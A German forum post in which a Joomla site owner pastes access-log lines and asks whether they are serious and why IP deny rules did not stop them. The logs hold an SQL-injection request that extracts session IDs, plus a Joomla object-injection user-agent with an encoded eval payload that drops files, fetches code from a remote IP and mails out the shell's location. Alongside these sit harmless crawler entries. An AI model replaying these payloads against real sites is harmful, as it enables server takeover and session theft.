Hallo,
ich bin ganz neu hier im Forum und habe ein Frage zu meinen Accesslogs.
Ich schaue diese mehrmals die Woche durch und habe heute Aktionen entdeckt die sich mir nicht ganz erschließen!
Vielleicht kann mir hier ja ein erfahrener Nutzer weiterhelfen und gegbenenfalls Tipps/Ratschläge geben ob es sich um
ernstzunehmende Ausführungen handelt und was ich dagegen tun kann.
Wie kann es zB. sein das Aktionen stattfinden obwohl die IP-Adressen per Deny ausgeschlossen sind ?
Hier ein paar Auszüge aus den aktuelle Logs
62.210.162.42 - - [12/Aug/2016:04:44:41 +0200] "GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=73&type_id=1&list[select]=(select 1=updatexml(1,concat(0x5e24,(select session_id from jos_session where guest<>1 limit 0,1),0x5e24),1)) HTTP/1.0" 403 177 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
Jetzt mit 301er Status
62.210.162.42 - - [12/Aug/2016:04:44:41 +0200] "GET //index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=73&type_id=1&list[select]=(select 1=updatexml(1,concat(0x5e24,(select session_id from jos_session where guest<>1 limit 0,1),0x5e24),1)) HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
Hier noch was anderes...
157.55.39.170 - - [12/Aug/2016:03:02:54 +0200] "GET /111162965661983540126/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:54 +0200] "GET /tag/%e3%82%b3%e3%83%bc%e3%82%ae%e3%83%bc/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:54 +0200] "GET /asin/B0162IXSDO HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:54 +0200] "GET /special/2015/cyber/index2.html?cat_id=cyber_1225 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:55 +0200] "GET /index.php/ergebnisse2/jahr-2015 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:55 +0200] "GET /index.php/gale/v4Rav4RaIJB5pHOn/TosQTosQbARFlX0I-01.jsp HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:55 +0200] "GET /index.php/subspecies/v4Rav4RaIJB5xLTM/TosQQxSpIJB5pHOnTosQ-01.jsp HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:55 +0200] "GET /keyword/%A5%AE%A5%E3%A5%E9%A5%EB%A5%DB%A5%EB%A5%F3 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:55 +0200] "GET /keyword/%A5%CF%A5%C6%A5%CA HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:55 +0200] "GET /keyword/Edy HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:56 +0200] "GET /oricon HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:56 +0200] "GET /photo/1657/?cat_id=rightphoto02 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
157.55.39.170 - - [12/Aug/2016:03:02:56 +0200] "GET /post-11479/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:08 +0200] "GET /tag/%e3%83%96%e3%83%ab%e3%83%89%e3%83%83%e3%82%b0/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:08 +0200] "GET /tag/%e3%82%b7%e3%82%a7%e3%83%91%e3%83%bc%e3%83%89/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:08 +0200] "GET /post-5952/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:08 +0200] "GET /ticket/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:09 +0200] "GET /index.php/reflection/v4Rav4RaIJB5Fml0/v4RaQxSpFml0pHOn-01.jsp HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:09 +0200] "GET /index.php/heritage/v4Rav4RaIJB5TosQ/pHOnlX0ITosQbARF-01.jsp HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:09 +0200] "GET /index.php?main_page=index&cPath=11 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:09 +0200] "GET /tag/%e5%ad%90%e3%81%ad%e3%81%93/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:09 +0200] "GET /k/keywordblog/%E3%83%8F%E3%83%86%E3%83%8A HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:09 +0200] "GET /tag/%e3%83%a9%e3%83%96%e3%83%a9%e3%83%89%e3%83%bc%e3%83%ab/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:10 +0200] "GET /keyword/%A5%D1%A5%CA%A5%BD%A5%CB%A5%C3%A5%AF HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
207.46.13.10 - - [12/Aug/2016:03:03:10 +0200] "GET /tag/%e3%83%a9%e3%82%b0%e3%83%89%e3%83%bc%e3%83%ab/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; bingbot/2.0;
__test|O Aktion (stammt noch aus der Zeit bevor ich die Seite neu aufgesetzt habe)
74.208.132.3 - - [09/Aug/2016:16:31:25 +0200] "GET / HTTP/1.1" 301 178 "-" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:3858:\x22eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9sb2wucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21aMWJtTjBhVzl1SUdoMGRIQmZaMlYwS0NSMWNtd3BldzBLQ1NScGJTQTlJR04xY214ZmFXNXBkQ2drZFhKc0tUc05DZ2xqZFhKc1gzTmxkRzl3ZENna2FXMHNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc0lERXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDd2dNVEFwT3cwS0NXTjFjbXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5R1QweE1UMWRNVDBOQlZFbFBUaXdnTVNrN0RRb0pZM1Z5YkY5elpYUnZjSFFvSkdsdExDQkRWVkpNVDFCVVgwaEZRVVJGVWl3Z01DazdEUW9KY21WMGRYSnVJR04xY214ZlpYaGxZeWdrYVcwcE93MEtDV04xY214ZlkyeHZjMlVvSkdsdEtUc05DbjBOQ2lSamFHVmpheUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyeHBZbkpoY21sbGN5OXFiMjl0YkdFdlkzTnpMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6YzBMakl3T0M0eE16SXVNeTluWlhRdlkzTnpMblI0ZENjcE93MEtKRzl3Wlc0Z1BTQm1iM0JsYmlna1kyaGxZMnNzSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3Wlc0c0lDUjBaWGgwS1RzTkNtWmpiRzl6WlNna2IzQmxiaWs3RFFwcFppaG1hV3hsWDJWNGFYTjBjeWdrWTJobFkyc3BLWHNOQ2lBZ0lDQmxZMmh2SUNSamFHVmpheTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeUk3RFFwbFkyaHZJQ0prYjI1bElDNWNiaUFpSURzTkNpUmphR1ZqYXpJZ1BTQWtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc0xuQm9jQ0lnT3cwS0pIUmxlSFF5SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEE2THk4M05DNHlNRGd1TVRNeUxqTXZaMlYwTDIwdWRIaDBKeWs3RFFva2IzQmxiaklnUFNCbWIzQmxiaWdrWTJobFkyc3lMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjR1Z1TWl3Z0pIUmxlSFF5S1RzTkNtWmpiRzl6WlNna2IzQmxiaklwT3cwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdOb1pXTnJNaWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTWk0aVBDOWljajRpT3cwS2ZXVnNjMlVnRFFvZ0lHVmphRzhnSW01dmRDQmxlR2wwY3pJaU93MEtaV05vYnlBaVpHOXVaVElnTGx4dUlDSWdPdzBLRFFva1kyaGxZMnN6UFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwzY3VhSFJ0SWlBN0RRb2tkR1Y0ZERNZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6YzBMakl3T0M0eE16SXVNeTluWlhRdmR5NTBlSFFuS1RzTkNpUnZjRE05Wm05d1pXNG9KR05vWldOck15d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQXpMQ1IwWlhoME15azdEUXBtWTJ4dmMyVW9KRzl3TXlrN0RRb05DaVJqYUdWamF6UTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2YkdsaWNtRnlhV1Z6TDJwdmIyMXNZUzlqYUdWamF5NXdhSEFpSURzTkNpUjBaWGgwTkNBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dk56UXVNakE0TGpFek1pNHpMMmRsZEM5akxuUjRkQ2NwT3cwS0pHOXdORDFtYjNCbGJpZ2tZMmhsWTJzMExDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEUXNKSFJsZUhRMEtUc05DbVpqYkc5elpTZ2tiM0EwS1RzTkNnMEtKR05vWldOck5UMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTlNBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dk56UXVNakE0TGpFek1pNHpMMmRsZEM5dGJTNTBlSFFuS1RzTkNpUnZjRFU5Wm05d1pXNG9KR05vWldOck5Td2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTFMQ1IwWlhoME5TazdEUXBtWTJ4dmMyVW9KRzl3TlNrN0RRb05DaVJqYUdWamF6WTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2YkdsaWNtRnlhV1Z6TDJwdmIyMXNZUzlxZFhObGNpNXdhSEFpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dk56UXVNakE0TGpFek1pNHpMMmRsZEM5MWMyVnlMblI0ZENjcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0puWVdKaWVTNWpZWE5vUUhsaGJtUmxlQzVqYjIwc2JtVjNjMmhsYkd3eE4wQm5iV0ZwYkM1amIyMHNZMkZ5Y205c2JHUmhjbXhwYm1jd01ERkFaMjFoYVd3dVkyOXRJanNOQ2lSemRXSnFaV04wSUQwZ0owcHZiU0I2ZW5vZ0p5QXVJQ1JmVTBWU1ZrVlNXeWRUUlZKV1JWSmZUa0ZOUlNkZE93MEtKR2hsWVdSbGNpQTlJQ2RtY205dE9pQkxaV3RyWVdrZ1UyVnVjMlZ1SUR4MmIyNVNaV2x1YUdWeWVrdHNZWFZ6UUZOaGFXdHZkVzVoU0dsaWFTNWpiMjArSnlBdUlDSmNjbHh1SWpzTkNpUnRaWE56WVdkbElEMGdJbE5vWld4c2VpQTZJR2gwZEhBNkx5OGlJQzRnSkY5VFJWSldSVkpiSjFORlVsWkZVbDlPUVUxRkoxMGdMaUFpTDJ4cFluSmhjbWxsY3k5cWIyOXRiR0V2YW0xaGFXd3VjR2h3UDNVaUlDNGdJbHh5WEc0aUlDNGdjR2h3WDNWdVlXMWxLQ2tnTGlBaVhISmNiaUk3RFFva2MyVnVkRzFoYVd3Z1BTQkFiV0ZwYkNna2RHOTZMQ0FrYzNWaWFtVmpkQ3dnSkcxbGMzTmhaMlVzSUNSb1pXRmtaWElwT3cwS0RRcEFkVzVzYVc1cktGOWZSa2xNUlY5ZktUc05DZzBLRFFvL1BnPT0nKSk7DQpmY2xvc2UoJGZwKTs='));JFactory::getConfig();exit\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\xFD\xFD\xFD"
Zum Joomla:
- aktuelle 3.6.2
- PHP 7.0.7 / MySQL PDO
- .htaccess Schutz im Root und als Verzeichnisschutz im administrator Ordner
- als .htaccess nutze ich die von dieser Seite angebotene mit zusätzlichen zahlreichen IP Denys
Ich hoffe auf eure Hilfe - Danke